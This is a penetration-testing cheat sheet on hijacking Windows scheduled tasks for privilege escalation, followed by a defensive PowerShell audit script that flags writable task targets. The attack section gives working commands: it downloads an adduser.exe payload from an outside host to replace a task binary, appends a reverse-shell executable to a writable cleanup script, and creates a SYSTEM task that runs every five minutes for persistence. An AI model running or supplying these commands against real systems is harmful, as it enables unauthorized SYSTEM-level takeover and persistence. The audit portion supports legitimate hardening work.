>_ shadow.red

Scheduled Task Hijacking

Tags: Privilege Escalation, Windows, Tasks, windows

Enumerate non-Microsoft tasks

Get-ScheduledTask | where {$_.TaskPath -notlike '\Microsoft*'} | Format-Table TaskName,TaskPath,State

Detail for one task

schtasks /query /tn "TASK_NAME" /V /FO LIST

Inspect ACL on the script the task runs

icacls C:\Users\steve\Pictures\BackendCacheCleanup.exe
icacls "C:\DevTools\CleanUp.ps1"

Replace the executable / script

iwr -Uri http://192.168.119.3/adduser.exe -OutFile BackendCacheCleanup.exe
move .\Pictures\BackendCacheCleanup.exe BackendCacheCleanup.exe.bak
move .\BackendCacheCleanup.exe .\Pictures\

Append to a writable PS1 cleanup script

echo C:\PrivEsc\reverse.exe >> C:\DevTools\CleanUp.ps1

Wait for the task to fire, catch the SYSTEM shell.
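The enumeration and ACL checks above, folded into one audit script that lists every non-Microsoft task whose action target (the executable, or the script passed to a script host) is writable by low-privileged principals. This is an added example, not part of the original page; it assumes Windows PowerShell 5.1+ with the ScheduledTasks module and is run as a local administrator so all task definitions and ACLs are readable.

```powershell
# Added audit script (not from the original page): flags non-Microsoft scheduled
# tasks whose action target is writable by low-privileged principals.
# Assumes Windows PowerShell 5.1+ with the ScheduledTasks module; run as a
# local administrator so every task definition and ACL can be read.

$lowPriv = @('Everyone','BUILTIN\Users','NT AUTHORITY\Authenticated Users',
             'NT AUTHORITY\INTERACTIVE')
$writeMask = [System.Security.AccessControl.FileSystemRights]'Write, Modify, FullControl'

function Get-ActionTarget {
    param([string]$Execute, [string]$Arguments)
    # Expand %SystemRoot%-style variables and strip surrounding quotes.
    $exe = [Environment]::ExpandEnvironmentVariables($Execute).Trim('"')
    # For script hosts, the file that matters is the script named in the arguments.
    if ($exe -match '(?i)(powershell|pwsh|cmd|cscript|wscript)(\.exe)?$' -and $Arguments) {
        $m = [regex]::Match($Arguments, '(?i)["'']?([a-z]:\\[^"'']+\.(ps1|bat|cmd|vbs|js))')
        if ($m.Success) { return $m.Groups[1].Value }
    }
    return $exe
}

function Test-LowPrivWritable {
    param([string]$Path)
    if (-not (Test-Path -LiteralPath $Path)) { return $false }
    $acl = Get-Acl -LiteralPath $Path
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($lowPriv -notcontains $ace.IdentityReference.Value) { continue }
        if (($ace.FileSystemRights -band $writeMask) -ne 0) { return $true }
    }
    return $false
}

Get-ScheduledTask | Where-Object { $_.TaskPath -notlike '\Microsoft*' } | ForEach-Object {
    $task = $_
    foreach ($action in $task.Actions) {
        if (-not $action.Execute) { continue }   # skip COM-handler actions
        $target = Get-ActionTarget $action.Execute $action.Arguments
        [pscustomobject]@{
            Task     = $task.TaskPath + $task.TaskName
            RunsAs   = $task.Principal.UserId
            RunLevel = $task.Principal.RunLevel
            Target   = $target
            Writable = Test-LowPrivWritable $target   # $true = hijack candidate
        }
    }
} | Where-Object { $_.Writable } | Format-Table -AutoSize
```

Any row shown with RunsAs SYSTEM or RunLevel Highest is the condition the hijack above relies on; fix it by tightening the target's ACL (and its parent directory, since a writable folder also allows the rename-and-replace trick) or by moving the target under a protected path.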

Create your own scheduled task

schtasks /create /ru SYSTEM /sc MINUTE /MO 5 /tn RUNME /tr "\"C:\Tools\sirenMaint.exe\""
schtasks /RUN /TN "RUNME"